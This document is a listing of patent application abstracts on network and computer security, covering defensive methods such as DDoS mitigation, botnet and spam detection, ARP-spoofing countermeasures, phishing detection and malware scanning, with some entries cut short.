20090031420Methods and systems for network traffic security - The present invention is directed to methods of and systems for adaptive networking that monitors a network resource of a network. The method monitors an application performance. The method categorizes a first subset of traffic of the network. The categories for the first subset include trusted, known to be bad, and suspect. The method determines an action for a second subset of traffic based on the category for the first subset of traffic. Some embodiments provide a system for adaptive networking that includes a first device and traffic that has a first subset and a second subset. The system also includes a first resource and a second resource for the transmission of the traffic. The first device receives the traffic and categorizes the traffic into the first and second subsets. The first device assigns the first subset to the first resource. Some embodiments provide a network device that includes an input for receiving incoming traffic, an output for sending outgoing traffic, a categorization module that categorizes incoming traffic, and a resource assignment module that assigns the categorized traffic for a particular resource. A traffic category for the device includes suspect traffic.01-29-2009
20090254989CLUSTERING BOTNET BEHAVIOR USING PARAMETERIZED MODELS - Identification and prevention of email spam that originates from botnets may be performed by finding similarity in their host property and behavior patterns using a set of labeled data. Clustering models of host properties pertaining to previously identified and appropriately tagged botnet hosts may be learned. Given labeled data, each botnet may be examined individually and a clustering model learned to reflect upon a set of selected host properties. Once a model has been learned for every botnet, clustering behavior may be used to look for host properties that fit into a profile. Such traffic can be either discarded or tagged for subsequent analysis and can also be used to profile botnets preventing them from launching other attacks. In addition, models of individual botnets can be further clustered to form superclusters, which can help understand botnet behavior and detect future attacks.10-08-2009
20090049546Method and Apparatus for Detection of Malicious Behavior in Mobile Ad-Hoc Networks - Systems and methods are provided for detecting malicious behavior in mobile ad-hoc wireless networks. The mobile ad-hoc network contains a plurality of actual nodes and a plurality of decoys that are derived from the actual nodes using duplicate instances of the operational software of the actual nodes in combination with a virtual interconnection topology created to make the decoys appear as actual nodes within the mobile ad-hoc network. The interconnection topology includes routing characteristics indicating that the most efficient path of communication to any given decoy is through at least one actual node in the network. The decoys are used to identify malicious behavior in the network and in particular to identify attempt to communicate directly with decoys in contradiction to the created interconnection topology. When the malicious behavior is associated with an identifiable node, corrective action is taken that includes quarantining that node from the other nodes in the network.02-19-2009
20090313697System and method for pathological pattern protection - In a frame synchronous scrambled communications network, communications are protected from pathological bit patterns that may lead to loss of receiver lock by detecting a pathological bit pattern in an incoming traffic stream using a pathological pattern detector. When a pathological bit pattern, such as a transition-less bit pattern, is detected, a corrective bit pattern is generated and inserted or substituted into the incoming traffic stream before transmission to the receiver. The receiver can be configured to revert the modified traffic stream back to the original traffic stream.12-17-2009
20090217376HOME-USE INFORMATION PRODUCT AND MOBILE TERMINAL - A mobile terminal and a home-use information product capable of retaining the security even under a network attack, while achieving P2P connection. When detecting a network attack, a home-use information product (08-27-2009
20100037316MANAGING A SOFTWARE ITEM ON A MANAGED COMPUTER SYSTEM - A method and system is provided of managing a current software item on a managed computer system connectable to a management computer system via a computer network. The method includes identifying, using an agent application, the current software item on the managed computer system, identifying if the current software item is an unauthorized software item; and selectively disabling the unauthorized software item.02-11-2010
20100064366Request processing in a distributed environment - A method for request processing in a distributed system includes obtaining event request information at a plurality of application servers, at least some of the event request information pertaining to a resource access request that is sent from a client terminal and that corresponds to a Uniform Resource Locator (URL) resource, transferring the event request information to an anti-attack server, determining, based at least in part on the at least some of the event request information, a total number of access requests to the URL resource made by the client terminal in a specified period of time, and determining, based at least on the total number of access request determined and a predefined access rule, whether an abnormal access request has been made by the client terminal.03-11-2010
20100077476METHOD AND APPARATUS FOR DETECTING MALWARE IN NETWORK TRAFFIC - A method and apparatus for detecting malware in network traffic is described. One embodiment executes, in an emulation environment, an executable file as it is being received serially over a network, execution beginning once a block of data including an entry point of the executable file has been received, execution halting whenever an instruction in the executable file references data not yet received and resuming once the data not yet received has been received, execution ceasing upon satisfaction of a termination condition; examining the emulation environment for indications that the executable file includes malware; and taking corrective action responsive to the results of examining the emulation environment for indications that the executable file includes malware.03-25-2010
20080256632APPARATUS AND METHOD FOR DETECTION OF A DENIAL OF SERVICE ATTACK ON AN INTERNET SERVER - An apparatus and method to detect a denial of service attack on an internet server by a hacker or malevolent software while effectively distinguishing an attack from a spike in demand by legitimate users of the server. In preferred embodiments, the kernel's TCP implementation is modified to hold back sending a reset (RST) to terminate the connection and to make an entry into a dead connection list when a connection attempt is dropped off of an overflowing accept queue. The entries are removed from the dead connection list when they become stale or an ACK is received corresponding to the entry. Additional TCP kernel parameters include a monitor enable to turn on or off the DoS monitor, a monitor threshold to determine when to send an alarm, and a stale time that is a timeout value to determine when to remove entries from the dead connection list.10-16-2008
20110252473Protection of Computer System - Protection of a computer system (10-13-2011
20100058471METHOD AND SYSTEM FOR DEFENDING DDOS ATTACK - In a method of defending a Distributed Denial of Service (DDoS) attack, an attack target server determines whether the attack target server suffers a DDoS attack from a plurality of terminals and, according to a result of the determination, informs a control server that the attack target server suffers the DDoS attack by transmitting its own information to the control server. The control server which has received the information of the attack target server confirms the plurality of terminals which transmits data to the attack target server and transmits an attack prevention message to the plurality of confirmed terminals. Each of the plurality of terminals which has received the attack prevention message determines whether the terminal launches the DDoS attack and, according to a result of the determination, blocking the DDoS attack.03-04-2010
20100058469ANOMALY INFORMATION DISTRIBUTION WITH THRESHOLD - Embodiments of the present disclosure provide techniques for distributing information about possible anomalies in a network. A sensor in a network may detect packets with payloads that match an anomaly signature. Address dispersion information, for example, in the form of source and address bitmaps, may be gathered at the sensor. The address dispersion information may be distributed to one or more peer sensors if the information indicates that the number of different addresses of the detected matching packets exceeds a threshold.03-04-2010
20100058467EFFICIENCY OF ACTIVE CONTENT FILTERING USING CACHED RULESET METADATA - A start offset and an end offset can be identified within unfiltered content that is to be filtered. This unfiltered content can include HTML content. A corresponding start offset and an end offset of the unfiltered content can be matched against a set of content objects contained in a content cache. Each of the content objects can be associated with rule metadata. At least one filter rule can be extracted from metadata of a matching cache object. A programmatic action can be performed based upon the extracted filter rule. Computer readable output can result from the programmatic action. The output can include content that has been filtered in accordance with the extracted filter rule.03-04-2010
20100251367METHOD AND APPARATUS FOR PROVIDING INFORMATION ASSURANCE ATTRIBUTES THROUGH A DATA PROVIDENCE ARCHITECTURE - A method and apparatus that provides information assurance attributes through a data providence architecture is disclosed. The method may include receiving a message having a data provenance wrapper, examining each data provenance record of the message and any attachments for discrepancies, identifying any discrepancies in the examination of each data provenance record of the message and any attachments; calculating a degree of trust based on any discrepancies identified in the examination of each data provenance record of the message and any attachments, and outputting the degree of trust to the user.09-30-2010
20110107421METHOD AND APPARATUS FOR PROVIDING FRAUD DETECTION USING CONNECTION FREQUENCY THRESHOLDS - An approach provides detection of unauthorized use of data services. A determination is made as to whether connections supporting remote access to a data network are completed. The number of completed connections associated with a selected attribute is tracked over a time period. It is then determined whether the number of completed connections satisfies a connection frequency threshold. A fraud alert is generated if the connection frequency threshold is satisfied.05-05-2011
20110083179SYSTEM AND METHOD FOR MITIGATING A DENIAL OF SERVICE ATTACK USING CLOUD COMPUTING - A system and method for mitigating a denial of service attack that includes distributing network communication messages directed at a resource within a resource cloud, directing the distributed network communication messages, filtering the network communication messages according to filter parameters that relate to the legitimacy of the communication message, and sending the communication message to the resource if the communication message is filtered as legitimate or performing a request limiting response to the communication message if the communication message is filtered as illegitimate.04-07-2011
20110252472Bot-Network Detection Based on Simple Mail Transfer Protocol (SMTP) Characteristics of E-Mail Senders Within IP Address Aggregates - A method and system for determining whether an IP address is part of a bot-network are provided. The IP-address-aggregate associated with the IP address of an e-mail sender is determined. The IP-address-aggregate is associated with an IP-address-aggregate-category based on the current SMTP traffic characteristics of the IP-address-aggregate and the known SMTP traffic characteristics of an IP-address-aggregate-category. A bot-likelihood score of the IP-address-aggregate-category is then associated with IP-address-aggregate. IP-address-aggregate-categories can be established based on historical SMTP traffic characteristics of the IP-address-aggregates. The IP-address-aggregates are grouped based on SMTP characteristics, and the IP-address-aggregate-categories are defined based on a selection of IP-address-aggregates with similar SMTP traffic characteristics that are diagnostic of spam bots vs. non-botnet-controllers spammers. Bot likelihood scores are determined for the resulting IP-address-aggregate-categories based on historically known bot IP addresses.10-13-2011
20100251365DYNAMIC SCANNING BASED ON COMPLIANCE METADATA - In embodiments of the present invention improved capabilities are described for systems, methods, and devices that assess a metadata factor associated with metadata of code to determine a compliance state of said code; assign or adjust a security sensitivity factor based at least in part on said compliance state of said code; and provide a security facility with an indicator of how aggressively to monitor the code for malicious code infection.09-30-2010
20100251368SYSTEM AND METHOD FOR HANDLING AN EVENT IN A COMPUTER SYSTEM - Systems for handling an event in a computer system which has a kernel-mode and a user-mode. The systems comprise at least one computing device. The computing device is configured to suspend an occurrence of the event in the kernel-mode of an operating system running thereon. The computing device is also configured to cause the event to occur in the user-mode of the operating system. The computing device is further configured to determine if an occurrence of the event in the kernel-mode will compromise the computer system by analyzing the occurrence of the event in the user-mode. If it is determined that the occurrence of the event in the kernel-mode will compromise the computer system, then the computing device executes at least one security measure.09-30-2010
20100251366DISCOVERY OF THE USE OF ANONYMIZING PROXIES BY ANALYSIS OF HTTP COOKIES - In embodiments of the present invention improved capabilities are described for systems, methods, and devices that determine whether a website request is from a proxy website or an anonymizer. Embodiments intercept a website request from an end point; identify at least one cookie present in said website request; analyze a predetermined characteristic of said website request, where the predetermined characteristic associated with the cookie; and apply a rule corresponding to said predetermined characteristic to make the determination as to whether the request is from a proxy website or anonymizer.09-30-2010
20120304295Method and Apparatus for Detecting Computer Fraud - Techniques are provided for detecting computer fraud. The techniques include obtaining a text version of a candidate destination and a graphical rendering of the candidate destination, comparing the text version of the candidate destination and the graphical rendering of the candidate destination with a corresponding text version of a stored destination and a corresponding graphical rendering of the stored destination, and generating a fraud warning if the graphical rendering of the candidate destination is substantially similar to the graphical rendering of the stored destination while the text version of the candidate destination differs substantially from the corresponding text version of the stored destination.11-29-2012
20120304294Network Monitoring Apparatus and Network Monitoring Method - According to one embodiment, a network monitoring apparatus includes an unauthorized node determination module, a spoofed address resolution protocol request transmission module, and a spoofed address resolution protocol reply transmission module. The unauthorized node determination module determines whether a sender node which transmits an address resolution protocol request packet is an unauthorized node. The spoofed address resolution protocol request transmission module transmits a spoofed address resolution protocol request packet to a target node corresponding to a target network address in the address resolution protocol request packet if the sender node is an unauthorized node. The spoofed address resolution protocol reply transmission module transmits to the unauthorized node a spoofed address resolution protocol reply packet which includes a predetermined physical address other than the physical address of the target node as a sender physical address and a network address of the target node as a sender network address.11-29-2012
20120304292EXTERNAL LINK PROCESSING - A system and method of external link processing is disclosed. The system includes an interface configured to receive a user request to access an encoded external link in networked content. The encoded external link comprises a domain name of an external link server and an encoded portion which is an encoded result of an original external link encoded with an encoding function, wherein the original external link is an address to an external destination. One or more processors determine a safety level of the encoded external link using a criterion. In the event that the determined safety level of the encoded external link is determined unsafe, a warning message is generated indicating that the original external link is unsafe and the user is prevented from directly navigating to the original external link.11-29-2012
20120304291ROTATION OF WEB SITE CONTENT TO PREVENT E-MAIL SPAM/PHISHING ATTACKS - Embodiments of the invention provide a method, system and computer program product for phishing attack management through Web site content rotation. In an embodiment of the invention, a method for phishing attack management through Web site content rotation is provided. The method includes receiving a request for a variation of a component to be incorporated into a Web page from a requesting Web page rendering engine from over a computer communications network. The method also includes comparing the requested variation of the component to a currently configured variation of the component. Finally, the method includes returning both the requested variation of the component and an alert indicating a possible phishing attack in response to the request if the requested variation of the component differs from the currently configured variation of the component.11-29-2012
20120304290CYBER ISOLATION, DEFENSE, AND MANAGEMENT OF A INTER-/INTRA- ENTERPRISE NETWORK - Methodologies, tools and processes for the cyber isolation, defense, and management of an inter-/intra-enterprise network utilizing NSA-approved Type-1 encryptors to first completely isolate all HardNet fixed and mobile participants from the logical internet. Secondly, to enable inter-corporation traffic exchange while maintaining the established security barrier. Next, to create a network demarcation point through which all traffic shall enter or exit HardNet, and through which all traffic shall be inspected with DoD grade cyber security and information assurance (IA) capabilities. Effective net end result is a weapons-grade cyber security shield and cyber management capability for the business, educational, non-profit, governmental and all other enterprises.11-29-2012
20120304289ROTATION OF WEB SITE CONTENT TO PREVENT E-MAIL SPAM/PHISHING ATTACKS - Embodiments of the invention provide a method, system and computer program product for phishing attack management through Web site content rotation. In an embodiment of the invention, a method for phishing attack management through Web site content rotation is provided. The method includes receiving a request for a variation of a component to be incorporated into a Web page from a requesting Web page rendering engine from over a computer communications network. The method also includes comparing the requested variation of the component to a currently configured variation of the component. Finally, the method includes returning both the requested variation of the component and an alert indicating a possible phishing attack in response to the request if the requested variation of the component differs from the currently configured variation of the component.11-29-2012
20120304287AUTOMATIC DETECTION OF SEARCH RESULTS POISONING ATTACKS - Search result poisoning attacks may be automatically detected by identifying groups of suspicious uniform resource locators (URLs) containing multiple keywords and exhibiting patterns that deviate from other URLs in the same domain without crawling and evaluating the actual contents of each web page. Suspicious websites are identified and lexical features are extracted for each such website. The websites are clustered based on their lexical features, and group analysis is performed on each group to identify at least one suspicious group. Other implementations are directed to detecting a search engine optimization (SEO) attack by processing a large population of URLs to identify suspicious URLs based on the presence of a subset of keywords in each URL and the relative newness of each URL.11-29-2012
20120304286METHODS AND APPARATUS FOR BLOCKING USAGE TRACKING - Methods and apparatuses that maintain one or more data stores capable of storing local data in a device for loading a resource of a domain are described. The resource may be loaded to cause one or more data access operations on the data stores. Access to usage tracking data of the device from the domain may depend on at least one of the data access operations. The data access operations may be configured to block the usage tracking data of the device from the domain. The data access operations may be performed on the data stores for the loading of the resource. A web page may be presented to a user when the resource is successfully loaded.11-29-2012
20110088093USB CONNECTOR AND INTRUSION PREVENTION SYSTEM USING THE SAME - A security USB connector implements an intrusion prevention function preventing the propagation of malicious codes to a host terminal from a USB device while minimizing host terminal resource consumption, and an intrusion prevention system using the same are disclosed. A security USB connector is positioned between the host terminal supporting a USB host and a USB device, and a security inspection is performed on data transferred from the USB device to the host terminal through the security USB connector. Also, a host terminal without an intrusion prevention function can prevent an intrusion by using the portable security USB connector.04-14-2011
20110088092DETECTION OF NETWORK ADDRESS SPOOFING AND FALSE POSITIVE AVOIDANCE - A method for detection of network address spoofing and false positive avoidance in a network is described herein. The network may include one or more hosts and a network management system. The network management system may identify a suspicious host in the network. A condition indicative of network address spoofing by the suspicious host may be detected. It may be determined whether the spoofing condition is expected in normal traffic of the network. In response to a determination that the spoofing condition is expected, it is determined that the suspicious host generated normal traffic.04-14-2011
20110179486METHOD FOR NEUTRALIZING THE ARP SPOOFING ATTACK BY USING COUNTERFEIT MAC ADDRESSES - The present invention is related to a method for neutralizing a malicious ARP spoofing attack generated in a local network and in particular, the present invention provides a method for neutralizing an ARP spoofing attack comprising a step for detecting an ARP spoofing attack based on an ARP request packet generated for an ARP spoofing attack; a step for generating a plurality of counterfeit MAC addresses and dynamically changing MAC addresses of network devices or servers which are to be protected whenever an ARP spoofing attack is generated; and a step for neutralizing an ARP spoofing attack by using a counterfeit MAC address which is capable of neutralizing an ARP spoofing attack adequately.07-21-2011
20110078791Using chipset-based protected firmware for host software tamper detection and protection - A method, system, and computer program product for a host software tamper detection and protection service. A secure partition that is isolated from a host operating system of the host system, which may be implemented by firmware of a chipset of the host system, obtains file metadata from the host system and uses the file metadata to identify a first file for examination for tampering. The secure partition obtains data blocks for the first file, communicates with a service via an out-of-band communication channel, and uses information obtained from the service and the data blocks to determine whether the first file has been corrupted. The secure partition obtains the file metadata and the data blocks for the first file without invoking an operating system or file system of the host system.03-31-2011
20110072515METHOD AND APPARATUS FOR COLLABORATIVELY PROTECTING AGAINST DISTRIBUTED DENIAL OF SERVICE ATTACK - A method and apparatus for collaboratively protecting against a Distributed Denial of Service (DDoS) attack are provided. The method performed by a network apparatus includes detecting data suspected as being used in the DDoS attack by monitoring traffic forwarded to a service server, notifying a security apparatus that the detected data is suspected as being used in the DDoS attack, and performing at least one of a first operation and a second operation, the first operation being receiving an analysis result for the detected data from the security apparatus and controlling the traffic based on the analysis result, and the second operation being controlling, prior to the first operation, the traffic based on a rule set in advance.03-24-2011
20110078790API Signature Verification for High-Security Platforms - A system and method is disclosed for verifying whether a test API of a high-security software platform implements a reference API when a verification tool has insufficient permissions to detect one or more members of the test API. A signature is determined for a reference API implementation, which includes multiple API members. Determining the signature involves identifying a proper subset of the API members, where the subset excludes one or more API members that are not programmatically detectable by a given verification tool executing on a high-security platform that implements the reference API. The member may not be detectable by the verification tool because the tool has insufficient permission to programmatically detect the member on the high-security platform. The signature is then configured to indicate the members of the subset and not the excluded members. The signature is then stored.03-31-2011
20110078792SYSTEM AND METHOD FOR PROVIDING NETWORK SECURITY - A method includes receiving an indication of at least one detected security issue at a network device. The indication is received from a security agent at a security manager processor. The method includes polling, via the security manager processor, at least one other network device in response to the indication in order to retrieve additional information when the security manager processor determines that the additional information is needed. The method includes selecting, via the security manager processor, at least one executable security object responsive to the indication and the additional information. The method also includes initiating communication of the at least one executable security object to the network device via the security manager processor.03-31-2011
20110072516PREVENTION OF DISTRIBUTED DENIAL OF SERVICE ATTACKS - A method of automating the ability of a network to distinguish between a traffic generated by automated means and the traffic generated by human beings for blocking automated traffic during a distributed denial of service attack is disclosed. The method includes placing at least one validated traffic manager (VTM) computer on a computer network by a user. The method further includes monitoring a plurality of network requests by storing a plurality of user traffic source (UTS) lists such as a white list, a grey list and a black list on the at least one VTM computer. The method utilizes a reverse turning test (RTT) that includes a human verification process (HVP) to distinguish between the traffic generated by human beings and the automated traffic.03-24-2011
20110072514Scan Engine Manager with Updates - A scan management system may configure various workloads and data streams within those workloads to be directed to various scan engines. The scan management system may be updatable and configurable by receiving a catalog of available scan engines and configuring the workloads and scan engines according to a policy that may be locally created and managed. The scan management system may be capable of reconfiguring the scan engines, including upgrading, adding, deprecating, and changing scan engines while being fully operational. In some cases, a single data stream may be scanned by two or more different scan engines, and a single scan engine may be used to scan two or more different data streams.03-24-2011
20130160116DATA SECURITY SEEDING SYSTEM - In one aspect of the invention there is provided a system for tracking seed data that has been inserted into a secured private information database listing. The system includes a network, computer, and database. Incoming communications to the network are monitored and are matched to a phone number, credit card number, address, email, or fax number that corresponds to the seed data. Depending on the incoming communication software is configured to track and store third party identification information. The information is sent to a user to determine if the incoming phone call was conducted by breaching the secured private information database listing.06-20-2013
20130160117IDENTIFYING REQUESTS THAT INVALIDATE USER SESSIONS - An illustrative embodiment of a computer-implemented process for identifying a request invalidating a session excludes all marked logout requests of a Web application, crawls an identified next portion of the Web application and responsive to a determination, in one instance, that the state of the crawl is out of session, logs in to the Web application. The computer-implemented process further selects all crawl requests sent since a last time the crawl was in-session, excluding all marked logout requests and responsive to a determination that requests remain, crawls a selected next unprocessed request. Responsive to a determination, in the next instance, that state of the crawl is out of session and the selected request meets logout request criteria, the computer-implemented process marks the selected request as a logout request.06-20-2013
20110041178AUDITING A DEVICE - The auditing of a device that includes a physical memory is disclosed. One or more hardware parameters that correspond to a hardware configuration is received. Initialization information is also received. The physical memory is selectively read and at least one result is determined. The result is provided to a verifier.02-17-2011
20110035800MALICIOUS ADVERTISEMENT MANAGEMENT - Methods and systems are provided for managing malicious advertisements, including threats or risks posed by malicious advertisements or potentially malicious or risky advertisements. Methods are provided in which an advertisement is tested to determine behavioral characteristics at a non-active time and at an active time, and the two sets of characteristics are compared. If a difference is determined to exist, an action is taken that reflects a higher chance of the advertisement being malicious than if no difference was detected. Furthermore, the characteristics at a non-active time may be used in determining a degree of risk associated with an advertisement.02-10-2011
20110030054Progressive wiretap - Disclosed is a method and system for identifying a controller of a first computer transmitting a network attack to an attacked computer. To identify an attacker implementing the attack on the attacked computer, the present invention traces the attack back to the controller one hop at a time. The invention examines traces of the attacked computer to identify the first computer. Traffic transmitted to the first computer is redirected through a monitoring complex before being transmitted to the first computer. The controller is then detected from traffic monitoring by the monitoring complex.02-03-2011
20110016523APPARATUS AND METHOD FOR DETECTING DISTRIBUTED DENIAL OF SERVICE ATTACK - An apparatus for detecting a distributed denial of service (DDoS) attack includes: a monitoring unit for monitoring multiple GET requests and responses transmitted and received depending on a session establishment between a client and a server; and an attack detection unit for analyzing the monitored multiple GET requests and responses between the client and the server to detect a traffic of the DDoS attack against the server.01-20-2011
20110016522INTRUSION DETECTION SYSTEMS AND METHODS - Systems and methods for intrusion and virus detection in computer networks. Data from a file, network byte stream, or other source is segmented and resulting data items are subjected to multiple processing techniques to obtain respective result values, or thumbprints. The multiple thumbprints for respective data items are then aggregated to obtain a single result value, or aggregate thumbprint. The components of the aggregate thumbprint may be “fuzzified” to allow for less preciseness in the single result value. The aggregate thumbprint is compared to other similarly generated aggregate thumbprints stored in a library. Alerts may be generated when the same aggregate thumbprint is detected multiple times.01-20-2011
20110010772File System Event Tracking - Automated file system event tracking and reporting techniques are described in which file system events requested by a user application are intercepted and recorded prior to the request being permitted to pass to the file system for execution. Similarly, file system responses to a prior captured file system event are also intercepted and recorded. Predefined patterns of file system event may be aggregated and reported as a single event.01-13-2011
20100325727SECURITY VIRTUAL MACHINE FOR ADVANCED AUDITING - A security system collects an audit trail on a computer outside of a boundary created by one or more virtual machines. The security system uses a privileged virtual machine to collect audit logs for each protected virtual machine. As the protected virtual machines run, they send auditing information to the privileged virtual machine. The privileged virtual machine can collect auditing information from protected virtual machines much more quickly than a network server, as well as collecting auditing events from multiple protected virtual machines. Because the auditing destination is located on the same computer as the virtual machine monitored by the audit trail, no network dependency is present. Thus, the security system allows for monitoring the activity of administrators and other users while preventing tampering with the audit trail of each user's actions.12-23-2010
20110154489SYSTEM FOR ANALYZING MALICIOUS BOTNET ACTIVITY IN REAL TIME - A system for analyzing malicious botnet activity in real time is disclosed. This system may include: a control server configured to generate botnet activity information relating to a type of malicious botnet activity, and transmit the botnet activity information to the outside, after receiving bot occurrence information from the outside;06-23-2011
20110154488SYSTEMS AND METHODS FOR GENERATING AND MANAGING COOKIE SIGNATURES FOR PREVENTION OF HTTP DENIAL OF SERVICE IN MULTI-CORE SYSTEM - The present application is directed towards systems and methods for generating and maintaining cookie consistency for security protection across a plurality of cores in a multi-core system. A packet processing engine executing on one core designated as a primary packet processing engine generates and maintains a global random seed. The global random seed may be used as an initial seed for creation of cookie signatures by each of a plurality of packet processing engines executing on a plurality of cores of the multi-core system using a deterministic pseudo-random number generation function such that each core creates an identical set of cookie signatures.06-23-2011
20110258700VERIFYING AUTHENTICITY OF INSTANT MESSAGING MESSAGES - A method comprises performing verification of an IM message sent using a specified Instant Messaging (IM) screen name and received by an information recipient after successful verification of authenticity of an authentication certificate received by the information recipient from the specified IM screen name. Verifying the IM message includes successfully verifying authenticity of the IM message using authentication information contained in the received authentication certificate. The IM message includes an encoded checksum for designated parts of the IM message. Performing verification of the IM message includes verifying authenticity of the encoded checksum.10-20-2011
20110258699METHOD AND APPARATUS FOR THE PREVENTION OF A SERVICE DEGRADATION ATTACK - In a wireless communication system where the data transmission is optimized with respect to the channel state information fed back by the users, a service degradation attack can be made by feeding back faked channel state information. A method for preventing a service degradation attack on a first wireless communication device by a second wireless communication device in a wireless communication system, said method comprising: verifying by a base station whether the channel state information sent to the base station by the second wireless communication device corresponds to its real channel.10-20-2011
20100281536PHISH PROBABILITY SCORING MODEL - In general, embodiments of the invention relate to systems, methods, and computer program products for determining the probability that a given website is conducting or is related to fraudulent activity, including phishing activity. More particularly, embodiments of the invention relate to automatically monitoring and scoring URLs for fraudulent activity by parsing keywords, combinations of keywords, and other relevant data from an input communication, such as an email, and analyzing the data obtained against a database containing a plurality of grading factors.11-04-2010
20120151578Detecting a suspicious entity in a communication network - A method and apparatus for detecting a suspicious entity in a communication network. A receiving device receives a message from a sender. A processor obtains domain information or a user identity, and further contact information from data contained in the message. A reputation query message is sent to a Network Reputation Server (NRS), the reputation query message including the domain information or user identity. A reply is received from the NRS that indicates that the domain information or user identity is related to a suspicious entity. The receiving device then associates the contact information with the suspicious entity. In this way, if a user of the receiving device attempts to use the contact information, they can be prevented from doing this or informed that it relates to a suspicious entity.06-14-2012
20120204260Controlling access to sensitive data based on changes in information classification - A Data Loss Prevention (DLP) system includes an automated method for tracking changes to a security classification (e.g., content category) associated with an artifact to determine whether an attempt is being made to subvert a DLP policy. The method exploits the basic principle that, depending on context, the classification of a particular artifact, or a change to an existing classification, may indicate an attempt to subvert the policy. According to the method, an artifact classification state machine is implemented within a DLP system. For each policy-defined content category on each artifact, the machine identifies a content category change that may be of interest, as defined by policy. When a change in a classification has occurred, an artifact notification event (or, more generally, a notification of the change in classification) is issued.08-09-2012
20080229415SYSTEMS AND METHODS FOR PROCESSING DATA FLOWS - A flow processing facility, which uses a set of artificial neurons for pattern recognition, such as a self-organizing map, in order to provide security and protection to a computer or computer system supports unified threat management based at least in part on patterns relevant to a variety of types of threats that relate to computer systems, including computer networks. Flow processing for switching, security, and other network applications, including a facility that processes a data flow to address patterns relevant to a variety of conditions are directed at internal network security, virtualization, and web connection security. A flow processing facility for inspecting payloads of network traffic packets detects security threats and intrusions across accessible layers of the IP-stack by applying content matching and behavioral anomaly detection techniques based on regular expression matching and self-organizing maps. Exposing threats and intrusions within packet payload at or near real-time rates enhances network security from both external and internal sources while ensuring security policy is rigorously applied to data and system resources. Intrusion Detection and Protection (IDP) is provided by a flow processing facility that processes a data flow to address patterns relevant to a variety of types of network and data integrity threats that relate to computer systems, including computer networks.09-18-2008
20100083376METHOD AND APPARATUS FOR REDUCING FALSE POSITIVE DETECTION OF MALWARE - Method and apparatus for detecting malware are described. In some examples, files of unknown trustworthiness are identified as potential threats on the computer. A trustworthiness level for each of the files is received from a backend. The trustworthiness level of each of the files is compared to a threshold level. Each of the files where the trustworthiness level thereof satisfies the threshold level is designated as a false positive threat. Each of the files where the trustworthiness level thereof does not satisfy the threshold level is designated as a true positive threat.04-01-2010
20100058470MOBILE TERMINAL TO PREVENT VIRUS INFECTION AND METHOD OF CONTROLLING OPERATION OF THE MOBILE TERMINAL - A mobile terminal and a method of controlling operation of the mobile terminal may be provided that include outputting a sensing signal corresponding to a detected attempt to make a call, connecting the call when user input indicates that it is allowed to connect the call, and if the user input indicates that it is not allowed to connect the call, shutting down the detected attempt. Accordingly, suspicious operation that may have been caused by a virus may be shut down to prevent damage to a mobile terminal caused by a virus.03-04-2010
20100058468IDENTIFYING REPUTATION AND TRUST INFORMATION FOR SOFTWARE - Methods, systems, and computer program products identify trust and reputation information for an application. Status information including installation information and/or rating information corresponding to a software application is stored in a service or in a local computer cache. A software application is identified as corresponding to the status information, and the installation information and/or rating information is presented to a user prior to installation, launch, and/or update of the software application. Using the status information the user can make an informed decision on whether the user will trust the software application to permit the installation, launch, and/or update to occur.03-04-2010
20090288163CONTROLLING THE SPREAD OF INTERESTS AND CONTENT IN A CONTENT CENTRIC NETWORK - One embodiment of the present invention provides a system for controlling the spread of interests and content in a content centric network (CCN). During operation, the system maintains a routing policy for content data. The system also receives a packet associated with a piece of content or an interest for the content. Next, the system determines that the structured name included in the packet is within the namespace specified in the routing policy. The system further determines that the packet satisfies the condition in the routing policy. Subsequently, the system routes the packet based on in part the action corresponding to the condition as specified in the routing policy.11-19-2009
20090254990SYSTEM AND METHOD FOR INTELLIGENT COORDINATION OF HOST AND GUEST INTRUSION PREVENTION IN VIRTUALIZED ENVIRONMENT - A distributed and coordinated security system providing intrusion-detection and intrusion-prevention for the virtual machines (VMs) in a virtual server is described. The virtualization platform of the virtual server is enhanced with networking drivers that provide a “fast path” firewall function for pre-configured guest VMs that already have dedicated deep packet inspection security agents installed. A separate security VM is deployed to provide virtual security agents providing deep packet inspection for non pre-configured guest VMs. The network drivers are then configured to intercept the data traffic of these guest VMs and route it through their corresponding virtual security agents, thus providing a “slow-path” for intrusion detection and prevention.10-08-2009
20090254988EVALUATION APPARATUS, EVALUATION METHOD, EVALUATION PROGRAM AND INTEGRATED CIRCUIT - In a system for transmitting/receiving information, each of users of terminals subjectively determines a direct evaluation value of a party that the user knows personally and so on. Since the direct evaluation value determined in this way changes depending on the subjective evaluation criterion, the direct evaluation value is not generated based on the single evaluation criterion. In view of this, a terminal device 10-08-2009
20090241188COMMUNICATION MONITORING APPARATUS AND COMMUNICATION MONITORING METHOD - A communication monitoring apparatus includes a session extracting unit which extracts a packet in a session established between a pair of a transmitting device and a receiving device from a plurality of packets, a lead-packet extracting unit which extracts a lead packet including control information on communication between the transmitting device and the receiving device from the packet, a storage unit in which an unauthorized signature is stored, a verification unit which performs verification between the lead packet and the unauthorized signature, and an output unit which supplies a monitoring result indicating that the session extracted by the session extracting unit is an unauthorized communication when the lead packet includes a portion matched with the unauthorized signature.09-24-2009
20090222917DETECTING SPAM FROM METAFEATURES OF AN EMAIL MESSAGE - Detecting spam from metafeatures of an email message. As a part of detecting spam, the email message is accessed and a distribution of numerical values is accorded to a set of features of the email message. It is determined whether the distribution of numerical values accorded the set of features of the email message is consistent with that of spam. Access is provided to the determination of whether the email message has a distribution of numerical values accorded the set of features that is consistent with that of spam.09-03-2009
20090222918Systems and methods for protecting a server computer - A server computer protection apparatus protects a server computer against DoS attacks, but allows access to the server. The server computer protection apparatus comprises a unit configured to calculate the load state of the server computer on the basis of the number of data requests made upon the server computer, and the number of data responses of the server responsive to the data requests, and for changing the rate of data requests to be transferred to the server, in accordance with the load state.09-03-2009
20110179485METHOD AND DEVICE FOR RECOGNIZING ATTACKS ON A SELF-SERVICE MACHINE - The invention relates to a method for recognizing attacks on at least one interface of a computer system, particularly a self-service machine, comprising: monitoring the interface in order to detect changes to the interface; if changes occur, the probability of an impermissible attack on the interface is determined based on the nature of the change; if the probability is above a defined threshold value, defensive measures are taken.07-21-2011
20080320591METHOD AND SYSTEM FOR VERIFYING IDENTIFICATION OF AN ELECTRONIC MAIL MESSAGE - A method and system for verifying identification of an electronic mail message. An electronic mail message including a signature and a key is received, the signature identifying a domain from which the electronic mail message originated and the key for verifying the signature. A key registration server of the domain is accessed to verify the key. The key registration server provides for verifying that a key used to sign an electronic mail message is valid and that the sender is authorized by the domain to send the electronic mail message from the return address.12-25-2008
